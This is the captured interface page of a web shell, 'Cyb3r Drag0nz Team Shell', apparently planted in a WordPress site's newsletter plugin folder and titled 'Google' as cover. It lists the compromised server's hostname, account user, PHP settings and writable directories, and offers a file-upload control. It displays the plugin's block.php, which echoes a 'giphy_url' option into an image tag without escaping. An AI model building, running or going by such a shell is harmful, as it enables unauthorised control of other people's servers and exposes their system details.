Google

Cyb3r Drag0nz Team Shell

Server : Apache
System : Linux webd003.cluster126.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : atwiofrxug (73666)
PHP Version : 8.4.10
Disable Functions : _dyuweyrj4,_dyuweyrj4r,dl
Current Directory : /home/atwiofrxug/mylittletelaviv/wp-content/plugins/newsletter/emails/blocks/giphy/
Directory Status: Writeable | Document Root: Writeable

Upload File







Viewing: /home/atwiofrxug/mylittletelaviv/wp-content/plugins/newsletter/emails/blocks/giphy/block.php

<?php
/*
 * Name: Giphy
 * Section: content
 * Description: Add a Giphy image
 * 
 */

/* @var $options array */
/* @var $wpdb wpdb */

$default_options = array(
    'view'=>'View online',
    'text'=>'Few words summary',
    'block_background'=>'#ffffff',
    'font_family'=>$font_family,
    'font_size'=>13,
    'color'=>'#999999',
    'block_padding_top'=>15,
    'block_padding_bottom'=>15,
    'block_padding_left'=>0,
    'block_padding_right'=>0
);

$options = array_merge($default_options, $options);

?>

<table width="100%" border="0" cellpadding="0" align="center" cellspacing="0">
    <tr>
        <td width="100%" valign="top" align="center">
            <img src="<?php echo $options['giphy_url'] ?>" style="max-width: 100%!important; height: auto!important;" />
        </td>
    </tr>
</table>


Cyb3r Drag0nz Team • Google Edition